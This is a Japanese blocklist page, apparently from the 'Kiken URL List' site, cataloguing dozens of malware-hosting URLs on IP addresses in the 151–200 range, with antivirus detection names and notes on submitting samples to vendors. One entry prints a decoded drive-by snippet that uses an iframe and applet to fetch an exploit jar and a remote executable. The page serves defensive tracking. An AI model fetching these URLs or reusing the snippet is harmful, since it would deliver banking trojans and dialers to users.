Kiken URL List
http:// IPアドレス から始まるURL ( 151.0.0.0 〜 200.255.255.255 )

このページは危険と思われるURLでhttp:// IPアドレス から始まるURLを掲載していますが、
そのうち、http:// 151.0.0.0 から http:// 200.255.255.255 までを掲載しています。
他のサイトからこのページに来られた方は最初に Kiken URL List のトップページ をよく読んでください。


Kiken URL List の見方

通し番号.URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説
  ← このようになっています。

  1. http://190.7.197.163/seguranca_bradesco.exe
    [2009/03/12]ウィルス名:TSPY_BANKER.KAT


  2. http://190.92.0.45/cat/index.html
    [2008/08/14]2008/07/21 の時点で以下のファイルが落ちてきた。しかし、今日改めて確認すると、ファイルは落ちて来ず、ページも無くなっていた。
    //190.92.0.45/cat/viewcard.exe ← ウィルス名:BKDR_VANBOT.NI


  3. http://190.92.0.45/cat/viewcard.exe
    [2008/08/14]2008/07/21 にトレンドマイクロ社にファイルを提出。
    2008/08/05 にその結果の連絡があり、パターンファイル[5.435.00] にてウィルス名:BKDR_VANBOT.NI として検出するよう対応、とのこと。
    実際に 2008/07/21 にDLしたファイルからウィルス名:BKDR_VANBOT.NI を検出することを確認。
    しかし、今日改めて当該URLからDLしようとしたら 404 であった。


  4. http://190.120.229.185/windows-Live/msnvideo.exe
    [2010/03/22]ファイルサイズ:405 KB 。高い確率で不正なファイルと思われる。


  5. http://190.120.229.185/windows-Live/msnvideoou.exe
    [2010/03/22]ファイルサイズ:404 KB 。高い確率で不正なファイルと思われる。


  6. http://190.120.229.185/windows-Live/voxcard.exe
    [2010/03/22]ファイルサイズ:429 KB 。高い確率で不正なファイルと思われる。


  7. http://193.104.22.203/download/Setup_2011.exe
    [2010/03/23]ファイルサイズ:222 KB 。高い確率で不正なファイルの一種と思われる。


  8. http://193.104.106.50/63.exe
    [2010/03/22]ファイルサイズ:196 KB 。ウィルス名:WORM_PALEVO.AK


  9. http://193.111.244.157/15/exe/load.exe
    [2009/03/12]ウィルス名:TROJ_AGENT.MMJ


  10. http://193.138.205.121/spc.gif
    [2009/01/28]gif画像ではなく、「file.exe」という名前のファイルが落ちてくる。
    しかし、ウィルス名:PAK_GENERIC.001 を検出。
    [2009/01/28]他の方の結果は以下の「」内。
    「踏んでみると実行ファイルが出てきて a-squared などがウイルス「Trojan.Win32.Vundo!IK」を検出しました。」


  11. http://193.238.209.17/hot_video.exe
    [2008/12/11]ウィルス名:TROJ_FAKEALER.PV


  12. http://194.146.226.245/~ircd152/film.exe
    [2006/12/28]ウィルス名:PE_PARITE.A


  13. http://194.187.45.55/DR21206.exe
    [2006/05/06]ウィルス名:TROJ_SMALL.BGX [ ウィルスバスター ]
    ウィルス名:Adware.Dh [ Dr.Web ]


  14. http://194.187.45.55/installerwebnex.exe
    [2006/05/06]ウィルス名:TROJ_DROPPER.AOA [ ウィルスバスター ]
    ウィルス名:Trojan.MulDrop.3049 [ Dr.Web ]


  15. http://194.187.45.55/MTE3NDI6ODoxNg.exe
    [2006/07/22]ウィルス名:TROJ_DLOADER.ATW


  16. http://194.237.110.185/Download/sexfiles_jp.cab#version=1,0,0,1
    [2007/02/20]DL+解凍すると「NewBrowser.exe」「sexfiles.exe」の2つのファイルが現れる。
    2007/02/12 にトレンドマイクロ社に この2つのファイルを提出。
    今日、その結果の連絡があり、以下の様に検出するよう対応、とのこと。
    「NewBrowser.exe」 → ウィルス名:DIAL_SEXFILE.A
    「sexfiles.exe」 → ウィルス名:DIAL_SEXFILE.B
    実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルから上記の様にウィルスを検出することを確認。
    2007/02/12 から今日までのファイルの置き換えは無いと推測される。


  17. http://195.95.218.83/users/sale/web/axe/counter.html
    [2005/07/14]ウィルス名:JS_MHTREDIR.P


  18. http://195.95.218.83/users/sale/web/win9x/classload.jar
    [2005/07/14]ウィルス名:JAVA_BYTEVER.A


  19. http://195.95.218.172/
  20. http://195.95.218.172/index.php
    [2005/06/07]踏むと こんな感じ のサーチサイト。スパイウェア:Cool Web Searchと同じ。
    この セキュリティ警告 を表示し、拒否すると これ を表示。「OK」を押すと再びセキュリティ警告表示。2回目のセキュリティ警告を拒否すると、それ以降、何も無し。
    このセキュリティ警告に関係するURLは以下。
    //69.31.82.26/connect.cgi?id=10
    //69.31.82.26/aconnect.cgi?wmid=10&pg=1


  21. http://195.95.218.173/dl/adv659/sploit.anr
    [2005/07/01]「sploit.anr」というファイルが落ちてくる。バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → TR/Exploit.MS05-002.Ani.A
    BitDefender → Exploit.Win32.MS05-002.Gen
    ClamAV → Exploit.W32.MS05-002
    Dr.Web → Exploit.ANIFile
    Kaspersky Anti-Virus → Trojan-Downloader.Win32.Ani.c
    VBA32 → Trojan-Downloader.Win32.Ani.c


  22. http://195.145.241.232/pornvideo815uw.exe
    [2008/12/11]ウィルス名:TROJ_EXCHANGE.AP


  23. http://195.225.169.17/access/
    [2006/10/11]ウィルス名:DIAL_CARPED.N


  24. http://195.225.169.17/access/dia/adult.exe
    [2006/08/29]2008/08/08 にトレンドマイクロ社にファイルを提出。
    未だにトレンドマイクロ社から結果の連絡は無いが、ウィルス名:DIAL_CARPED.N として対応してくれた模様。
    2008/08/08 にDLしたファイルからウィルス名:DIAL_CARPED.N を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_CARPED.N を検出することを確認。


  25. http://195.225.176.3/searcht/playups.jar
    [2005/03/06]ウィルス名:JAVA_BYTEVER.A


  26. http://195.225.176.25/user.scripts/u96/dir30886155.cgi
    [2005/07/28]ウィルス名:JAVA_BYTEVER.A。ソースはほとんど暗号化されているが、その中に下のURLを呼び出す記述が隠れている。
    //195.225.176.25/user6/msjld.jar


  27. http://195.225.176.25/user.scripts/u217/dir38500256.cgi
    [2006/10/11]ウィルス名:TROJ_ANICMOO.N+JAVA_BYTEVER.A


  28. http://195.225.176.25/user6/msjld.jar
    [2005/07/28]ウィルス名:JAVA_BYTEVER.A


  29. http://195.225.176.25/user6/xw.exe
    [2006/09/20]2006/09/08 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_AGENT.ERP として検出するよう対応、とのこと。
    2006/09/08 にDLしたファイルからウィルス名:TROJ_AGENT.ERP を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_AGENT.ERP を検出することを確認。


  30. http://195.225.176.34/ad/0145/service32.exe
    [2006/10/01]2006/09/23 にトレンドマイクロ社にファイルを提出。
    2006/09/29 にその結果の連絡があり、ウィルス名:TROJ_SMALL.DOK として検出するよう対応、とのこと。
    2006/09/23 にDLしたファイルからウィルス名:TROJ_SMALL.DOK を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_SMALL.DOK を検出することを確認。


  31. http://195.225.176.34/ad/0146/service32.exe
    [2006/09/20]2006/09/08 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.CUJ として検出するよう対応、とのこと。
    しかし、2006/09/08 にDLしたファイルからはウィルス名:TROJ_SMALL.DFO を検出する。
    しかも、今日改めて当該URLからDLしてみるとバスター無反応。
    恐らく、新しいファイルに随時置き換えられるURLと推測される。
    [2006/10/01]2006/09/23 にトレンドマイクロ社にファイルを再提出。
    2006/09/29 にその結果の連絡があり、ウィルス名:TROJ_SMALL.DOJ として検出するよう対応、とのこと。
    2006/09/23 にDLしたファイルからウィルス名:TROJ_SMALL.DOJ を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_SMALL.DOJ を検出することを確認。


  32. http://195.225.176.34/stat2/0032/service32.exe
  33. http://195.225.176.34/stat2/0033/service32.exe
    [2006/10/14]2006/10/11 にトレンドマイクロ社に上記2つのファイルを提出。
    2006/10/13 にその結果の連絡があり、2つのファイルとも「正常と判断されたファイルで対応は行わない。」とのこと。


  34. http://195.225.176.34/stat2/0034/service32.exe
    [2006/06/24]バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → HEUR/Hijacker
    BitDefender → BehavesLike:Win32.ExplorerHijack
    DrWeb → MULDROP.Trojan packed by BINARYRES
    [2006/07/31]再確認。ウィルス名:TROJ_SMALL.AZK
    [2006/09/24]再確認。今度はウィルス名:TROJ_AGENT.EVP を検出する。


  35. http://195.225.176.34/user2/bond0018/service32.exe
    [2006/10/24]2006/10/16 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.EQX として検出するよう対応、とのこと。
    実際に 2006/10/16 にDLしたファイルからウィルス名:TROJ_DLOADER.EQX を検出することを確認。
    しかし、今日改めて当該URLからDLしてみるとバスター無反応。
    新しいファイルに置き換えられているものと思われる。


  36. http://195.225.177.14/mmm/enter_to.html
    [2005/06/09]ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 このセキュリティ警告 を表示し、拒否すると これ を表示する。
    その後、これ を表示。その間、自分のリモホ内容の全画面表示。
    APPLETタグで右を実行 → //195.225.177.14/mmm/mmm.jar
    新窓で右をリモホ表示 → //rockygirl.com/warning.php
    IFRAMEタグで右を呼ぶ → //69.50.182.94/connect.cgi?id=1096
    IFRAMEタグで右を呼ぶ → //toolbarpartner.com/in.php?wm=2MAEjHcR


  37. http://195.225.177.14/mmm/mmm.jar
    [2005/06/09]ウィルス名:JAVA_BYTEVER.A


  38. http://195.225.177.33/0023.exe
    [2005/07/12]バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → TR/Dldr.Smal.awa.23
    ArcaVir → Trojan.Downloader.Small
    Avast → Win32:Trojano-1465
    AVG Antivirus → Downloader.Small.43.D
    Dr.Web → Trojan.DownLoader.2775
    Kaspersky Anti-Virus → Trojan-Downloader.Win32.Small.awa
    NOD32 → Win32/TrojanDownloader.Small.AWA
    VBA32 → Trojan-Downloader.Win32.Small.awa


  39. http://195.225.177.33/0023.html
    [2005/07/12]ウィルス名:JAVA_BYTEVER.A
    ソースを見るとエンコードされた部分が何箇所かある。その中から以下のスクリプトが現れてくる。

    <iframe src='Z6VB46e.php'></iframe>
    <APPLET ARCHIVE='qrxLcUX.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
    <PARAM NAME='url' VALUE='http://195.225.177.33/0023.exe'></APPLET>

    つまり、IFRAMEタグで下の 1. を呼び出し、環境により、2. を発動して 3. を放り込む。
    1. //195.225.177.33/Z6VB46e.php ← 踏むと無効な構文エラーでアドレスが「mhtml:http://195.225.177.33/Z6VB46e.php」になり、「ページを表示できません」となる。
    2. //195.225.177.33/qrxLcUX.jar ← ウィルス名:JAVA_BYTEVER.A
    3. //195.225.177.33/0023.exe ← バスター無反応だが、他アンチウィルスソフトで反応。


  40. http://195.225.177.33/qrxLcUX.jar
    [2005/07/12]ウィルス名:JAVA_BYTEVER.A


  41. http://195.225.177.38/tn/index.html
    [2005/05/22]踏むと海外アダルトサイト。
    ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JAVA_BYTEVER.A-1
    このセキュリティ警告 を表示。また、IFRAMEタグを使い、以下の3つのURLを呼び出す。
    //69.50.182.94/connect.cgi?id=1342
    //69.50.177.102/x125/ind.php
    //195.225.177.38/tds/in.cgi?nine&group=ma
    [2005/06/11]改めて確認。ウィルス名:JS_MHTREDIR.P
    以前とソースが変更されている。以前にあったIFRAMEタグ呼び出しは使われていない。
    [2005/07/12]改めて確認。ウィルス名:JS_MHTREDIR.Pを検出後、少しの間、HDDがガリガリ唸り出し、唸り終わるとウィルス名:TROJ_SMALL.AMIを検出。同時にIEが落ちる。IEが落ちるのは数回確認。
    ソースを見ると、まず、暗号化された部分がある。そこから以下の1のURLが現れる。
    次に、IFRAMEタグを使い、2、3のURLを呼び出している。
    次にJavaScriptを使い、4を呼び出している。4のURLの「呼び出すURL」が曲者。
    1、//82.179.170.11/35167/ ← ウィルス名:JAVA_BYTEVER.A-1
    2、//69.50.173.166/connect.cgi?id=1342 ← 環境により、ダイヤラーが落ちてくる。
    3、//69.50.177.102/x125/ind.php ← 詳細はこのURL解説を参照。
    4、//www.trackhits.cc/cnt/processor?tony008_1 ← 詳細はこのURL解説を参照。
    [2005/08/22]再確認。ページ更新されている。バスター無反応。
    真っ白なページに左上に「Account closed due terms violation」と書かれているだけ。
    [2005/12/05]再確認。踏むと こんな感じ で、バスター無反応。
    真っ白なページの左上のほうに「 Account closed due terms violation 」と書かれているだけであった。ソースを見ても異常無し。


  42. http://198.65.101.225/search/r.php?pa=1&pr=3&source=11&po=14&pi=1&nr=19&url2020=aHR0cDovL3d3dy5lYXN5cGljLm9yZy8%3D&Keywords=hometwat
    [2005/12/18]他の方の結果は以下の「」内。
    「海外ウイルスサイトに飛ばされます。」
    「Trojan-Downloader.JS.Phel.d , Exploit.JS.CVE-2005-1790.a , Exploit.JS.CVE-2005-1790.b検出。」
    [2005/12/18]踏むと //www.easypic.org/ に飛び、海外アダルトサイトを表示する。
    少し経過してからウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.ACを検出。
    //www.lolitapost.biz/ ← 海外アダルトサイトも別窓で開く。
    その後、色々なアダルトサイトがブラクラ並に開く現象を確認。
    [2006/01/02]再確認。//www.easypic.org/?sample01.jpgに飛ぶので、そちらのURL List解説を参照。
    [2006/01/12]再確認。//www.easypic.org/ に飛び、海外アダルトサイトを表示するが、「xpl.wmf」ファイルをDLしろ、と言ってくる。同時にウィルスを検出。
    検出したウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC


  43. http://198.65.101.225/search/r.php?pa=1&pr=3&source=11&po=15&pi=1&nr=19&url2020=aHR0cDovL3d3dy5wb3JuaGl0Lm5ldC8%3D&Keywords=hometwat
    [2005/12/18]他の方の結果は以下の「」内。
    「海外エロサイトに飛ばされます。ノートン無反応だが、Javaアプレットを起動します。怪しいので行かないほうがいい。」
    「Trojan-Downloader.JS.Phel.d , Exploit.JS.CVE-2005-1790.a , Exploit.JS.CVE-2005-1790.b , Exploit.Java.ByteVerifyなどを検出。」
    [2005/12/18]踏むと //www.pornhit.net/ に飛び、海外アダルトサイトを表示する。
    少し経過してからウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.ACを検出。
    //www.lolitapost.biz/ ← 海外アダルトサイトも別窓で開く。
    その後、色々なアダルトサイトがブラクラ並に開く現象を確認。


  44. http://198.65.101.225/search/r.php?pa=1&pr=3&source=11&po=16&pi=1&nr=19&url2020=aHR0cDovL3d3dy5wb3Jud29vZHMuY29tLz9nYWxhLXNleC5jb20%3D&Keywords=hometwat
    [2005/12/16]他の方の結果では、
    「ブラクラ+ウイルスです。トロイ系ウイルス JS/Exploit-BO.gen を検出。その他 逃げウィンドウ ゾンビ ウィンドウなど。」
    [2005/12/16]踏むと下のURLに飛び、ウィルスを検出する。詳細はURL List解説を参照。
    //www.pornwoods.com/?gala-sex.com


  45. http://198.65.114.251/desktop/20030/files/snb.exe
    [2007/02/20]2007/02/12 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:ADW_IMIBAR.G として検出するよう対応、とのこと。
    実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:ADW_IMIBAR.G を検出することを確認。
    2007/02/12 から今日までのファイルの置き換えは無いと推測される。


  46. http://198.65.114.251/desktop/20030/files/unist2.exe
    [2007/02/12]ウィルス名:ADW_SHOPNAV.H


  47. http://198.65.114.251/desktop/20031/files/eltupt.exe
    [2007/02/12]ウィルス名:TROJ_Generic.Z


  48. http://198.65.114.251/desktop/20031/files/snb.exe
    [2007/02/20]2007/02/12 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:ADW_IMIBAR.F として検出するよう対応、とのこと。
    実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:ADW_IMIBAR.F を検出することを確認。
    2007/02/12 から今日までのファイルの置き換えは無いと推測される。


  49. http://198.66.130.103/videopornu376x.exe
    [2008/12/11]ウィルス名:TROJ_PAKES.AGN


  50. http://198.88.20.158/targ305.chm
    [2006/08/01]2006/07/27 にトレンドマイクロ社にファイルを提出。
    今日、その連絡があり、ウイルスパターンファイル「3.629.00」にて、ウィルス名:CHM_DROPPER.BKL として検出するよう対応したとのこと。
    実際にファイルをDLしてウィルス名:CHM_DROPPER.BKL を検出することを確認。


  51. http://198.143.27.5/
    [2005/05/31]踏むと海外アダルトサイト。閉じると以下の1を表示。1を閉じると2を表示。2を閉じると3を表示。
    1、//198.143.27.5/aus_exit_1a.asp
    2、//198.143.27.5/aus_exit_2a.asp
    3、//198.143.27.5/aus_exit_3a.asp
    なお、上記のすべてのページで、すべてのリンク先は//198.143.27.5/USA.EXEにリンクしている。このURL解説を参照。
    また、上記のすべてのページで、このセキュリティ警告 を表示。//198.143.27.5/USA.cabをDLして実行するよう催促される。このURL解説を参照。
    また、3を閉じると「other.exe」なるファイルをDLしようとしてくる。この「other.exe」のURLは//198.143.27.5/other.exe ← このURL解説を参照。
    [2005/10/21]再確認。404になっている。


  52. http://198.143.27.5/Loader.cab
    [2005/03/06]ウィルス名:TROJ_QDIALER.R


  53. http://198.143.27.5/other.exe
  54. http://198.143.27.5/USA.cab
  55. http://198.143.27.5/USA.EXE
    [2005/05/31]真ん中の/USA.cabを解凍すると「12300010.exe」と「dialar」という名のセットアップ情報ファイルが現れる。
    セットアップ情報ファイルは無害。「12300010.exe」と「other.exe」と「USA.EXE」は同じもので、バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
    バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。3つともダイヤラー。
    Dr.Web → ウィルス名:Dialer.Fairtale
    Fortinet → ウィルス名:W32/ParHltnDialer.A-tr
    Kaspersky Anti-Virus → ウィルス名:Porn-Dialer.Win32.AsianRaw.ag
    NOD32 → ウィルス名:NewHeur_PE
    VBA32 → ウィルス名:Porn-Dialer.Win32.AsianRaw.ag
    [2005/09/02]USA.EXEを実行すると こんなウィンドウ画面 を表示する。


  56. http://198.143.27.14/live_chat/Loader.cab
    [2005/03/06]ウィルス名:TROJ_SMALL.FT


  57. http://198.143.27.15/xxxpics.cab
    [2006/10/30]2006/10/16 にトレンドマイクロ社にDL+解凍して現れた「55506857.exe」ファイルを提出。
    2006/10/24 にその結果の連絡があり、ウィルス名:DIAL_TELEX.B として検出するよう対応、とのこと。
    実際に 2006/10/16 にDLしたファイルからウィルス名:DIAL_TELEX.B を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TELEX.B を検出することを確認。


  58. http://198.143.27.15/xxxsite/05274.cab
    [2006/10/16]ウィルス名:DIAL_ADULTCHAT.C


  59. http://198.143.27.16/xxxaccess/99930903.cab
    [2006/10/27]2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「99930903.exe」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_ASIANRAW.AE として検出するよう対応、とのこと。
    実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_ASIANRAW.AE を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ASIANRAW.AE を検出することを確認。


  60. http://198.143.27.16/xxxaccess/Loader.cab
    [2006/10/15]ウィルス名:TROJ_SMALL.FT


  61. http://198.143.27.16/xxxpics.cab
    [2007/03/07]2006/10/15 にトレンドマイクロ社に中身の「99930886.exe」ファイルを提出。
    2006/10/27 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。
    実際に 2006/10/15 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。
    2006/10/15 から今日まではファイルは置き換えられていないと推測される。


  62. http://198.143.27.16/xxxpics.exe
    [2007/03/07]2006/10/15 にトレンドマイクロ社にファイルを提出。
    2006/10/27 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。
    実際に 2006/10/15 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。
    2006/10/15 から今日まではファイルは置き換えられていないと推測される。


  63. http://198.143.27.21/dialer_loader/uk.cab
    [2006/10/15]ウィルス名:DIAL_WILDFLICK.A


  64. http://198.143.27.21/xxx/adult.cab
    [2006/10/27]2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「99930080.exe」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_ASIANRAW.AD として検出するよう対応、とのこと。
    実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_ASIANRAW.AD を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ASIANRAW.AD を検出することを確認。


  65. http://198.143.27.21/xxx/adult.exe
    [2006/10/27]2006/10/15 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_ASIANRAW.AD として検出するよう対応、とのこと。
    実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_ASIANRAW.AD を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ASIANRAW.AD を検出することを確認。


  66. http://200.41.67.195/stats/index1.php
    [2008/08/28]Location ヘッダで、以下のURLに飛び、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.HM を検出。
    //200.41.67.195/stats/pornotube/index1.htm


  67. http://200.41.67.195/stats/pornotube/index1.htm
    [2008/08/28]海外アダルトサイトだが、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.HM を検出。


  68. http://200.41.67.195/stats/pornotube/video54582.exe
  69. http://200.41.67.195/stats/pornotube/video76566.exe
  70. http://200.41.67.195/stats/pornotube/video1439654.exe
    [2008/08/28]ウィルス名:TSC_GENCLEAN+TROJ_FAKEALER.PV


  71. http://200.101.115.133/all.zip
    [2007/02/09]ウィルス名:TROJ_SMALL.FVT


  72. http://200.101.115.133/jpg/ldr/cheking_boa.scr
    [2007/02/14]2007/02/09 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TSPY_BANKER.GFJ として検出するよう対応、とのこと。
    実際に 2007/02/09 にDLしたファイルからウィルス名:TSPY_BANKER.GFJ を検出することを確認。
    しかし、今日改めて当該URLを調べてみると404であった。


  73. http://200.101.115.133/jpg/ldr/facim.scr
    [2007/02/09]ウィルス名:TSPY_BANKER.GAO


  74. http://200.101.115.133/jpg/ldr/Fotos2007.cmd
    [2007/02/09]ウィルス名:TROJ_BANLOAD.BTW


  75. http://200.101.115.133/jpg/ldr/maravilha.scr
    [2007/02/09]ウィルス名:TSPY_BANKER.GAO


  76. http://200.101.115.133/jpg/ldr/microsoft.scr
    [2007/02/22]2007/02/09 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TSPY_BANKER.GDH として検出するよう対応、とのこと。
    実際に 2007/02/09 にDLしたファイルからウィルス名:TSPY_BANKER.GDH を検出することを確認。
    しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。


  77. http://200.101.115.133/jpg/ldr/posseidom_.scr
    [2007/02/09]ウィルス名:TSPY_BANKER.GAO


  78. http://200.101.115.133/jpg/ldr/vbcrt.scr
    [2007/02/27]2007/02/11 にトレンドマイクロ社にファイルを提出。
    2007/02/26 にその結果の連絡があり、ウィルス名:TSPY_BANCOS.CYN として検出するよう対応、とのこと。
    実際に 2007/02/11 にDLしたファイルからウィルス名:TSPY_BANCOS.CYN を検出することを確認。
    しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。


  79. http://200.101.115.133/loader.scr
    [2007/02/27]2007/02/11 にトレンドマイクロ社にファイルを提出。
    2007/02/26 にその結果の連絡があり、ウィルス名:TROJ_DLOADER.ITH として検出するよう対応、とのこと。
    実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_DLOADER.ITH を検出することを確認。
    しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。


  80. http://200.101.115.133/www/skipe.scr
    [2007/02/09]ウィルス名:TROJ_DLOADER.IFU


  81. http://200.111.155.122/squid/daily/images/.../download.php
    [2009/03/15]「visualizar.exe」ファイルが落ちてくる。ファイルサイズ:17 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応する。


  82. http://200.138.207.4/concursos/edital_petrobras-2006.exe
    [2007/01/21]ウィルス名:TSPY_BANKER.FXC


  83. http://200.163.19.210/imagens/bu/fotinha.scr
    [2007/03/06]2007/02/28 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.KHO として検出するよう対応、とのこと。
    実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_DLOADER.KHO を検出することを確認。
    しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。


  84. http://200.163.19.210/imagens/bu/fotinha.exe
    [2007/02/27]2007/02/11 にトレンドマイクロ社にファイルを提出。
    今日までに連絡は無かったが、ウィルス名:TROJ_DLOADER.FCD として対応したらしい。
    実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_DLOADER.FCD を検出。
    しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。


  85. http://200.163.19.210/imagens/bu/fotinha.scr
    [2007/02/27]2007/02/11 にトレンドマイクロ社にファイルを提出。
    2007/02/26 にその結果の連絡があり、ウィルス名:TROJ_VB.CBR として検出するよう対応、とのこと。
    実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_VB.CBR を検出。
    しかし、今日改めて当該URLからDLしてみるとバスター無反応。
    2007/02/11 から今日までの間にファイルが置き換えられたと推測される。


  86. http://200.163.19.210/imagens/foto.scr
    [2007/03/06]2007/02/28 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_VB.CNU として検出するよう対応、とのこと。
    実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_VB.CNU を検出することを確認。
    しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。


  87. http://200.163.19.210/imagens/imagem.scr
    [2007/03/06]2007/02/28 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_VB.COW として検出するよう対応、とのこと。
    実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_VB.COW を検出することを確認。
    しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。


  88. http://200.163.19.210/imagens/pl/cartao=154387145.scr
    [2007/02/28]2007/02/11 にトレンドマイクロ社にファイルを提出。
    2007/02/26 にその結果の連絡があり、ウィルス名:TROJ_DLOADER.FBU として検出するよう対応、とのこと。
    実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_DLOADER.FBU を検出。
    しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。


  89. http://200.163.19.210/imagens/zoi/foto.scr
    [2007/03/06]2007/02/28 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_VB.COW として検出するよう対応、とのこと。
    実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_VB.COW を検出することを確認。
    しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。


  90. http://200.171.85.170/~rmlyui/postcard.scr
    [2008/11/22]ウィルス名:TROJ_ZAPCHAST.ED


  91. http://200.181.118.66/img/home55654.exe
    [2007/05/03]ウィルス名:TROJ_BANLOAD.BYL


  92. http://200.181.118.66/img/ok.exe
    [2007/06/03]2007/05/04 にトレンドマイクロ社にファイルを提出。
    2007/05/30 にその結果の連絡があり、ウィルス名:TSPY_BANKER.ILK として検出するよう対応、とのこと。
    実際に 2007/05/04 にDLしたファイルからウィルス名:TSPY_BANKER.ILK を検出することを確認。
    しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。


  93. http://200.242.43.250/imgeditor/Flash/portal/Torpedo.Vivo.com
    [2009/03/12]ウィルス名:TROJ_DELF.HVU


  94. http://200.242.43.250/users/Musa.Brasileirao.com
    [2009/03/12]ウィルス名:TROJ_DELF.HVU